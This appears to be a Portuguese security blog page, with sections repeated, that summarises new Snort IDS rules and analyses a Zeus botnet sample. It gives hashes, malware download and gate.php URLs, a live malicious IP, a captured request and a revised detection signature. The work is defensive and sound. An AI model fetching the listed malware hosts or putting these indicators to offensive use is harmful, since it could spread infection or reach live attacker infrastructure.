2010856 - ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter INSERT INTO SQL Injection Attempt (emerging-web_specific_apps.rules)
2010857 - ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt (emerging-web_specific_apps.rules)
2010859 - ET TROJAN Buzus Trojan Proxy Attempt (emerging-virus.rules)
2010860 - ET TROJAN Buzus Proxy Server Response (emerging-virus.rules)
2010861 - ET TROJAN Zeus Bot Request to CnC (emerging-virus.rules)
As regras mais genericas podemos sempre frisar "ET TROJAN" no qual resurgiu do Trojan Buzus (http://www.pctools.com/mrc/infections/id/Trojan.Buzus/) com alterações de payload. Outra é a adição de mais uma regra de Zeus Bot para comunicação com o canal controlador e que não foi listada no ultimo post. Continuando nos TROJAN temos também o Fake AV e WScript/VBScript que é nova no ruleset (http://doc.emergingthreats.net/2010838) que são sempre validas ativa-las e roda-las por um tempo para até memos validar seu AV e Filtro de Conteúdo .
A regras de WEB_CLIENT são bem importantes e tivemos algumas novidades essa semana para proteçoes do Windows Defender (http://www.microsoft.com/windows/products/winfamily/defender/default.mspx) e uma para um plugin especifico do firefox( http://www.coresecurity.com/content/DXStudio-player-firefox-plugin ). Também tivemos updates para proteções de ActiveX (eu sinceramente sugiro desativar o ActiveX dos browsers caso você não tenha utilidade dentro da empresa que necessite disso obrigatoriamente)
Essa semana também como podem ver sairam regras para 3 componentes do Joomla(com_avosbillets,id_job,intuit.php) e caso utilizem os mesmo de suma importancia monitorar (logicamente atualizar mandatório no caso) .
Informações sobre todas as novas regras e mudanças do ET dessa semana pode ser encontrado em http://lists.emergingthreats.net/pipermail/emerging-sigs/2010-February/006442.html
Se vocês repararem nas minhas sugestões eu sempre viso muito as proteções client side por as mesmas serem de uso mais geral e usuário sempre a maior ameaça .
Espero que seja de grande utilidade a todos. Até a próxima semana.
Fiquem a vontade pra enviar dúvidas, sugestões e críticas, quero melhorar esse report a cada semana .
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
O VRT durante essa semana lançou 2 updates das regras com novos conteudos listados abaixo.
16438 <-> ORACLE WebLogic Server Node Manager arbitrary command execution attempt (oracle.rules, High)
16439 <-> SPECIFIC-THREATS Possible Zeus User-Agent - _TEST_ (specific-threats.rules, High)
16440 <-> SPECIFIC-THREATS Possible Zeus User-Agent - ie (specific-threats.rules, High)
16441 <-> SPECIFIC-THREATS Possible Zeus User-Agent - Download (specific-threats.rules, High)
16442 <-> SPECIFIC-THREATS Possible Zeus User-Agent - Mozilla (specific-threats.rules, High)
16443 <-> CHAT deny Gmail chat DNS request (chat.rules, High)
16444 <-> SPECIFIC-THREAT HP StorageWorks storage mirroring double take service code execution attempt (specific-threats.rules, High)
16445 <-> SPECIFIC-THREATS Digium Asterisk IAX2 ack response denial of service attempt (specific-threats.rules, Medium)
16446 <-> RPC portmap Solaris sadmin tcp request (rpc.rules, Medium)
16447 <-> RPC portmap Solaris sadmin udp request (rpc.rules, Medium)
16448 <-> RPC portmap Solaris sadmin tcp adm_build_path overflow attempt (rpc.rules, Medium)
16449 <-> RPC portmap Solaris sadmin udp adm_build_path overflow attempt (rpc.rules, Medium)
16450 <-> SQL Jive Software Openfire Jabber Server SQL injection attempt (sql.rules, High)
16451 <-> WEB-CLIENT Palm WebOS 1.2.0 floating point exception denial of service attempt (web-client.rules, Medium)
Anúncio completo 23/02 http://www.snort.org/vrt/docs/ruleset_changelogs/CURRENT/changes-2010-02-23.html
16452 <-> WEB-CLIENT IE .hlp samba share download attempt (web-client.rules, High)
Anúncio completo 26/02 http://www.snort.org/vrt/docs/ruleset_changelogs/CURRENT/changes-2010-02-26.html
O VRT baseado na crescente ameaça do Zeus Botnet agora conhecida como Kneber e como citado no post anterior ( http://spookerlabs.blogspot.com/2010/02/zeus-botnet-snort-e-falsos-negativos.html ) lançou 4 regras adicionais para essa ameaça baseado no user-agent. Eu particularmente não sei como estas regras tem se comportado mas caso você tenha informações por favor nos informe. Como sugerido no outro post ativar essas regras é bem interessante:
16439 <-> SPECIFIC-THREATS Possible Zeus User-Agent - _TEST_ (specific-threats.rules, High)
16440 <-> SPECIFIC-THREATS Possible Zeus User-Agent - ie (specific-threats.rules, High)
16441 <-> SPECIFIC-THREATS Possible Zeus User-Agent - Download (specific-threats.rules, High)
16442 <-> SPECIFIC-THREATS Possible Zeus User-Agent - Mozilla (specific-threats.rules, High)
Tirando a regra do gmail "CHAT deny Gmail chat DNS request" que é mais generica (ele detecta a resposta negativa da requisição do DNS do chatenable.mail.google.com ) e talvez do seu interesse caso precise bloquear o uso do mesmo na sua empresa do resto é muito espefico a produtos o que so torna o uso necessário caso tenham alguns dos produtos .
A falha especial que mandaram o update no dia 26 para WEB-CLIENT IE .hlp samba share download attempt (web-client.rules, High) me chamou atenção por nao ter um reference. Basicamente ele procura pelo conteúdo vbscript e que a extensão seja .hlp com \ no match também . Seria algo novo que pegaram em seu laboratorio ? Muito bom ativar ela e ver o que acontece .
Regras da semana do Emerging Threats
2010831 - ET TROJAN Fake AV - Downloader likely malicious payload download src=xrun) (emerging-virus.rules)
2010832 - ET TROJAN Fake AV Generic Download landing) (emerging-virus.rules)
2010833 - ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt (emerging-web_specific_apps.rules)
2010834 - ET WEB_CLIENT Windows Defender ActiveX DeleteValue method Heap Overflow Attempt (emerging-web_client.rules)
2010835 - ET WEB_CLIENT Windows Defender ActiveX DeleteValue method Remote Code Execution Function Call (emerging-web_client.rules)
2010836 - ET WEB_CLIENT Windows Defender ActiveX WriteValue method Heap Overflow Attempt (emerging-web_client.rules)
2010837 - ET WEB_CLIENT Windows Defender ActiveX WriteValue method Remote Code Execution Function Call (emerging-web_client.rules)
2010838 - ET TROJAN WScript/VBScript XMLHTTP downloader likely malicious get?src= (emerging-virus.rules)
2010839 - ET WEB_CLIENT Possible Rising Online Virus Scanner ActiveX Control Scan() Method Stack Buffer Overflow Attempt (emerging-web_client.rules)
2010840 - ET WEB_CLIENT Viscom Software Movie Player Pro SDK ActiveX 6.8 Remote Buffer Overflow Attempt (emerging-web_client.rules)
2010841 - ET WEB_CLIENT DX Studio Player Firefox Plug-in Command Injection Attempt (emerging-web_client.rules)
2010842 - ET WEB_SPECIFIC Joomla com_avosbillets Component id Parameter UPDATE SET SQL Injection Attempt (emerging-web_specific_apps.rules)
2010843 - ET WEB_SPECIFIC Joomla com_avosbilletsy Component id Parameter SELECT FROM SQL Injection Attempt (emerging-web_specific_apps.rules)
2010844 - ET WEB_SPECIFIC Joomla com_avosbillets Component id Parameter DELETE FROM SQL Injection Attempt (emerging-web_specific_apps.rules)
2010845 - ET WEB_SPECIFIC Joomla com_avosbillets Component id Parameter UNION SELECT SQL Injection Attempt (emerging-web_specific_apps.rules)
2010846 - ET WEB_SPECIFIC Joomla com_avosbillets Component id Parameter INSERT INTO SQL Injection Attempt (emerging-web_specific_apps.rules)
2010847 - ET WEB_SPECIFIC_APPS com_if_nexus controller Parameter Remote File Inclusion Attempt (emerging-web_specific_apps.rules)
2010848 - ET WEB_SPECIFIC_APPS Joomla morfeoshow morfeoshow.html.php Remote File Inclusion Attempt (emerging-web_specific_apps.rules)
2010851 - ET WEB_CLIENT Logitech VideoCall ActiveX Start method buffer overflow Attempt (emerging-web_client.rules)
2010852 - ET WEB_CLIENT WinDVD7 IASystemInfo.DLL ActiveX ApplicationType method buffer overflow Attempt (emerging-web_client.rules)
2010853 - ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter SELECT FROM SQL Injection Attempt (emerging-web_specific_apps.rules)
2010854 - ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter DELETE FROM SQL Injection Attempt (emerging-web_specific_apps.rules)
2010855 - ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UNION SELECT SQL Injection Attempt (emerging-web_specific_apps.rules)
2010856 - ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter INSERT INTO SQL Injection Attempt (emerging-web_specific_apps.rules)
2010857 - ET WEB_SPECIFIC_APPS Joomla com_job Component id_job Parameter UPDATE SET SQL Injection Attempt (emerging-web_specific_apps.rules)
2010859 - ET TROJAN Buzus Trojan Proxy Attempt (emerging-virus.rules)
2010860 - ET TROJAN Buzus Proxy Server Response (emerging-virus.rules)
2010861 - ET TROJAN Zeus Bot Request to CnC (emerging-virus.rules)
As regras mais genericas podemos sempre frisar "ET TROJAN" no qual resurgiu do Trojan Buzus (http://www.pctools.com/mrc/infections/id/Trojan.Buzus/) com alterações de payload. Outra é a adição de mais uma regra de Zeus Bot para comunicação com o canal controlador e que não foi listada no ultimo post. Continuando nos TROJAN temos também o Fake AV e WScript/VBScript que é nova no ruleset (http://doc.emergingthreats.net/2010838) que são sempre validas ativa-las e roda-las por um tempo para até memos validar seu AV e Filtro de Conteúdo .
A regras de WEB_CLIENT são bem importantes e tivemos algumas novidades essa semana para proteçoes do Windows Defender (http://www.microsoft.com/windows/products/winfamily/defender/default.mspx) e uma para um plugin especifico do firefox( http://www.coresecurity.com/content/DXStudio-player-firefox-plugin ). Também tivemos updates para proteções de ActiveX (eu sinceramente sugiro desativar o ActiveX dos browsers caso você não tenha utilidade dentro da empresa que necessite disso obrigatoriamente)
Essa semana também como podem ver sairam regras para 3 componentes do Joomla(com_avosbillets,id_job,intuit.php) e caso utilizem os mesmo de suma importancia monitorar (logicamente atualizar mandatório no caso) .
Informações sobre todas as novas regras e mudanças do ET dessa semana pode ser encontrado em http://lists.emergingthreats.net/pipermail/emerging-sigs/2010-February/006442.html
Se vocês repararem nas minhas sugestões eu sempre viso muito as proteções client side por as mesmas serem de uso mais geral e usuário sempre a maior ameaça .
Espero que seja de grande utilidade a todos. Até a próxima semana.
Fiquem a vontade pra enviar dúvidas, sugestões e críticas, quero melhorar esse report a cada semana .
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
quinta-feira, 25 de fevereiro de 2010
Zeus Botnet / Snort e falsos negativos
Nesse post farei breve comentários da Zeus Botnet e derivados, bem como como se proteger e as regras do snort para detecção do mesmo que tentam mitigar mas certamente também tomam um baile para gerar alertas devido as constantes mudanças .
Zeus ( http://en.wikipedia.org/wiki/Zeus_(trojan_horse) ) surgiu a longo tempo atrás e hoje em dia a Zeus Botnet também é conhecida como Zeus , Zbot, PRG, Wsnpoem, Gorhax ,Kneber . Um dos facilitadores e comum uso é a disponibilidade do codigo, add-ons, obfuscadores entre outros . Algumas informações aqui http://www.technologyreview.com/computing/24641/page2/ .
O único sistema operacional afetado é o windows (especialmente XP) como podem ver no gráfico abaixo:
As mais nova "versão" infectou milhares de computadores (incluindo empresas e governos, diferente das outras versões que visava mais home users) e foi chamada de Kneber (http://www.brc.com.br/index.php?option=com_content&task=view&id=1695&Itemid=362&lang=pt_BR )
O Snort possui por volta de 20 regras para detecção de atividades do Zeus e variáveis sendo 15 do Emerging-Threats e 5 do VRT da Sourcefire. As regras do VRT da Sourcefire são mais voltadas para monitoramento de User-Agent anomalos , enquanto do ET são mais genericas abrangendo comunicação com C&C , download de binarios infectados entre outros. Abaixo os alertas e sid das regras:
VRT
Alerta: "SPECIFIC-THREATS Zeus/Zbot malware config file download request" / sid: 15481
Alerta: "SPECIFIC-THREATS Possible Zeus User-Agent - Download" / sid: 16441
Alerta: "SPECIFIC-THREATS Possible Zeus User-Agent - Mozilla" / sid: 16442
Alerta: "SPECIFIC-THREATS Possible Zeus User-Agent - ie" / sid: 16440
Alerta: "SPECIFIC-THREATS Possible Zeus User-Agent - _TEST_" / sid: 16439
Emerging Threats
Alerta: "ET CURRENT_EVENTS NACHA/Zeus Phishing Executable Download Attempt" / sid: 2010342
Alerta: "ET CURRENT_EVENTS Zbot update (av-i386-daily.zip)" / sid: 2010568
Alerta: "ET CURRENT_EVENTS Zbot update (av_base/pay.php)" / sid: 2010566
Alerta: "ET CURRENT_EVENTS Zbot update (av_base/ip.php)" / sid: 2010567
Alerta: "ET CURRENT_EVENTS Zeus Bot / Zbot Checkin (/us01d/in.php)" / sid: 2010729
Alerta: "ET TROJAN PRG/wnspoem/Zeus InfoStealer Trojan Config Download" / sid: 2008100
Alerta: "ET TROJAN SpyBye Bot Checkin" / sid: 2010789
Alerta: "ET TROJAN Zbot/Zeus HTTP POST" / sid: 2008661
Alerta: "ET TROJAN Zbot/Zeus or Related Infection Checkin" / sid: 2008665
Alerta: "ET TROJAN Zbot/Zeus C&C Access" / sid: 2009175
Alerta: "ET TROJAN Zbot/Zeus Dropper Infection - /check" / sid: 2009212
Alerta: "ET TROJAN Zbot/Zeus Dropper Infection - /loads.php" / sid: 2009213
Alerta: "ET TROJAN - Possible Zeus/Perkesh (.bin) configuration download" / sid: 2010348
Alerta: "ET CURRENT_EVENTS MALWARE Potential Malware Download, trojan zbot" / sid: 2010448
Alerta: "ET TROJAN Zbot/Beomok/PSW - HTTP POST" / sid: 2009448
Infelizmente não possuo dados de alertas, infecção no Brasil (mas como podemos ver abaixo o Brasil não esta nos grandes alvos, pelo menos por enquanto ) , caso você tenha algo e possa colaborar terei enorme prazer em fazer um update desse post com informações das empresas/usuários nacionais . Se possuir samples ou mesmo tráfego e puder enviar também será de grande valia .
Abaixo uma análise basica de um sample
Malware Analysis
Submitted file: new4.exe
MD5: 05d2c93b2c8237dd17f0cdc2a0946cb0
SHA1: 87b32c9ca8bf58622e42a94db23ee95db309c9a1
Filesize: 135168
Analysis ID: 3095340
Sample ID: 1188540
Analysis result:
Your submitted sample has been successfully analyzed. You can find the report at https://mwanalysis.org/?site=1&page=details&id=1188540&password=szmtdbkrms
Parte do tráfego gerado na rede que é a parte que nos interessa
Download URLs
http://removed/new4.bin (91.201.28.35)
http://removed/gallery/portfolio/Kids_And_Adults/images/2k8.exe (php1.walkontheweb.com)
Data posted to URLs
http://removed/user3/gate.php (removed)
http://removed/user3/gate.php (removed)
Threat Expert
http://www.threatexpert.com/report.aspx?md5=05d2c93b2c8237dd17f0cdc2a0946cb0
* Trojan.Zbot [PCTools]
* Trojan.Zbot!gen3 [Symantec]
* Trojan-Spy.Win32.Zbot.gen [Kaspersky Lab]
* Generic PWS.y!bzs [McAfee]
* Mal/Generic-A [Sophos]
* Packed.Win32.Krap [Ikarus]
* Win-Trojan/Krap.135168.BA [AhnLab]
Anubis - http://anubis.iseclab.org/?action=result&task_id=10eabca7c3621d904e916a9fff3738c6f&format=html
O que mais curto no Anubis é que eles dão o pcap embora a melhor analise foi do malware analysis =)
GET /new4.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.201.28.35
Pragma: no-cache
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 25 Feb 2010 11:29:06 GMT
Content-Type: application/octet-stream
Connection: close
Last-Modified: Mon, 22 Feb 2010 17:58:37 GMT
ETag: "750e46-abb2-480342eb34d40"
Accept-Ranges: bytescp em
Content-Length: 43954
Aproveitando o post e a analise simples tambem modifiquei a regra para ficar mais generica ficando:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN - Possible Zeus/Perkesh (.bin) configuration download"; flow:established,to_server; content:"GET "; depth:4; content:"|0d 0a|Accept|3a| */*|0d 0a|"; uricontent:".bin"; pcre:"/\/[0-9A-Z]+\.bin$/Ui"; classtype:trojan-activity; reference:url,zeustracker.abuse.ch; reference:url,doc.emergingthreats.net/2010348; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Zeus,reference:url,anubis.iseclab.org/?action=result&task_id=10eabca7c3621d904e916a9fff3738c6f&format=html; sid:2010348; rev:5;)
Com isso teriamos o alerta:
# snort -c snort-ET.conf -K none -A console -q -r /LABS/PCAPS/zeus.pcap
02/25-08:28:02.537402 [**] [1:2010348:5] ET TROJAN - Possible Zeus/Perkesh (.bin) configuration download [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.0.2:1038 -> 91.201.28.35:80
Eu enviei a sugestão de mudanças para o ET mas temos sempre que ficar de olho se a mudanças não gerara muito Falso Positivo .
Como sempre vale dizer, mantenha seu AV atualizado, reforce as proteções com um bom filtro de conteúdo (interessante o que o Edison postou a pouco http://efigueira.blogspot.com/2010/02/boas-praticas-de-seguranca-na-empresa.html ) bem como reforce com um IDS e assinaturas. Infelizmente as mudanças são muitas e sempre e a chance de falsos negativos são grandes em todos os produtos e tecnologias por isso a necessidade de segurança em camadas para mitigar isso ao máximo possivel .
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
Zeus ( http://en.wikipedia.org/wiki/Zeus_(trojan_horse) ) surgiu a longo tempo atrás e hoje em dia a Zeus Botnet também é conhecida como Zeus , Zbot, PRG, Wsnpoem, Gorhax ,Kneber . Um dos facilitadores e comum uso é a disponibilidade do codigo, add-ons, obfuscadores entre outros . Algumas informações aqui http://www.technologyreview.com/computing/24641/page2/ .
O único sistema operacional afetado é o windows (especialmente XP) como podem ver no gráfico abaixo:
As mais nova "versão" infectou milhares de computadores (incluindo empresas e governos, diferente das outras versões que visava mais home users) e foi chamada de Kneber (http://www.brc.com.br/index.php?option=com_content&task=view&id=1695&Itemid=362&lang=pt_BR )
O Snort possui por volta de 20 regras para detecção de atividades do Zeus e variáveis sendo 15 do Emerging-Threats e 5 do VRT da Sourcefire. As regras do VRT da Sourcefire são mais voltadas para monitoramento de User-Agent anomalos , enquanto do ET são mais genericas abrangendo comunicação com C&C , download de binarios infectados entre outros. Abaixo os alertas e sid das regras:
VRT
Alerta: "SPECIFIC-THREATS Zeus/Zbot malware config file download request" / sid: 15481
Alerta: "SPECIFIC-THREATS Possible Zeus User-Agent - Download" / sid: 16441
Alerta: "SPECIFIC-THREATS Possible Zeus User-Agent - Mozilla" / sid: 16442
Alerta: "SPECIFIC-THREATS Possible Zeus User-Agent - ie" / sid: 16440
Alerta: "SPECIFIC-THREATS Possible Zeus User-Agent - _TEST_" / sid: 16439
Emerging Threats
Alerta: "ET CURRENT_EVENTS NACHA/Zeus Phishing Executable Download Attempt" / sid: 2010342
Alerta: "ET CURRENT_EVENTS Zbot update (av-i386-daily.zip)" / sid: 2010568
Alerta: "ET CURRENT_EVENTS Zbot update (av_base/pay.php)" / sid: 2010566
Alerta: "ET CURRENT_EVENTS Zbot update (av_base/ip.php)" / sid: 2010567
Alerta: "ET CURRENT_EVENTS Zeus Bot / Zbot Checkin (/us01d/in.php)" / sid: 2010729
Alerta: "ET TROJAN PRG/wnspoem/Zeus InfoStealer Trojan Config Download" / sid: 2008100
Alerta: "ET TROJAN SpyBye Bot Checkin" / sid: 2010789
Alerta: "ET TROJAN Zbot/Zeus HTTP POST" / sid: 2008661
Alerta: "ET TROJAN Zbot/Zeus or Related Infection Checkin" / sid: 2008665
Alerta: "ET TROJAN Zbot/Zeus C&C Access" / sid: 2009175
Alerta: "ET TROJAN Zbot/Zeus Dropper Infection - /check" / sid: 2009212
Alerta: "ET TROJAN Zbot/Zeus Dropper Infection - /loads.php" / sid: 2009213
Alerta: "ET TROJAN - Possible Zeus/Perkesh (.bin) configuration download" / sid: 2010348
Alerta: "ET CURRENT_EVENTS MALWARE Potential Malware Download, trojan zbot" / sid: 2010448
Alerta: "ET TROJAN Zbot/Beomok/PSW - HTTP POST" / sid: 2009448
Infelizmente não possuo dados de alertas, infecção no Brasil (mas como podemos ver abaixo o Brasil não esta nos grandes alvos, pelo menos por enquanto ) , caso você tenha algo e possa colaborar terei enorme prazer em fazer um update desse post com informações das empresas/usuários nacionais . Se possuir samples ou mesmo tráfego e puder enviar também será de grande valia .
Abaixo uma análise basica de um sample
Malware Analysis
Submitted file: new4.exe
MD5: 05d2c93b2c8237dd17f0cdc2a0946cb0
SHA1: 87b32c9ca8bf58622e42a94db23ee95db309c9a1
Filesize: 135168
Analysis ID: 3095340
Sample ID: 1188540
Analysis result:
Your submitted sample has been successfully analyzed. You can find the report at https://mwanalysis.org/?site=1&page=details&id=1188540&password=szmtdbkrms
Parte do tráfego gerado na rede que é a parte que nos interessa
Download URLs
http://removed/new4.bin (91.201.28.35)
http://removed/gallery/portfolio/Kids_And_Adults/images/2k8.exe (php1.walkontheweb.com)
Data posted to URLs
http://removed/user3/gate.php (removed)
http://removed/user3/gate.php (removed)
Threat Expert
http://www.threatexpert.com/report.aspx?md5=05d2c93b2c8237dd17f0cdc2a0946cb0
* Trojan.Zbot [PCTools]
* Trojan.Zbot!gen3 [Symantec]
* Trojan-Spy.Win32.Zbot.gen [Kaspersky Lab]
* Generic PWS.y!bzs [McAfee]
* Mal/Generic-A [Sophos]
* Packed.Win32.Krap [Ikarus]
* Win-Trojan/Krap.135168.BA [AhnLab]
Anubis - http://anubis.iseclab.org/?action=result&task_id=10eabca7c3621d904e916a9fff3738c6f&format=html
O que mais curto no Anubis é que eles dão o pcap embora a melhor analise foi do malware analysis =)
GET /new4.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.201.28.35
Pragma: no-cache
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 25 Feb 2010 11:29:06 GMT
Content-Type: application/octet-stream
Connection: close
Last-Modified: Mon, 22 Feb 2010 17:58:37 GMT
ETag: "750e46-abb2-480342eb34d40"
Accept-Ranges: bytescp em
Content-Length: 43954
Aproveitando o post e a analise simples tambem modifiquei a regra para ficar mais generica ficando:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN - Possible Zeus/Perkesh (.bin) configuration download"; flow:established,to_server; content:"GET "; depth:4; content:"|0d 0a|Accept|3a| */*|0d 0a|"; uricontent:".bin"; pcre:"/\/[0-9A-Z]+\.bin$/Ui"; classtype:trojan-activity; reference:url,zeustracker.abuse.ch; reference:url,doc.emergingthreats.net/2010348; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Zeus,reference:url,anubis.iseclab.org/?action=result&task_id=10eabca7c3621d904e916a9fff3738c6f&format=html; sid:2010348; rev:5;)
Com isso teriamos o alerta:
# snort -c snort-ET.conf -K none -A console -q -r /LABS/PCAPS/zeus.pcap
02/25-08:28:02.537402 [**] [1:2010348:5] ET TROJAN - Possible Zeus/Perkesh (.bin) configuration download [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.0.2:1038 -> 91.201.28.35:80
Eu enviei a sugestão de mudanças para o ET mas temos sempre que ficar de olho se a mudanças não gerara muito Falso Positivo .
Como sempre vale dizer, mantenha seu AV atualizado, reforce as proteções com um bom filtro de conteúdo (interessante o que o Edison postou a pouco http://efigueira.blogspot.com/2010/02/boas-praticas-de-seguranca-na-empresa.html ) bem como reforce com um IDS e assinaturas. Infelizmente as mudanças são muitas e sempre e a chance de falsos negativos são grandes em todos os produtos e tecnologias por isso a necessidade de segurança em camadas para mitigar isso ao máximo possivel .
Happy Snorting!
Rodrigo Montoro(Sp0oKeR)
Assinar:
Postagens (Atom)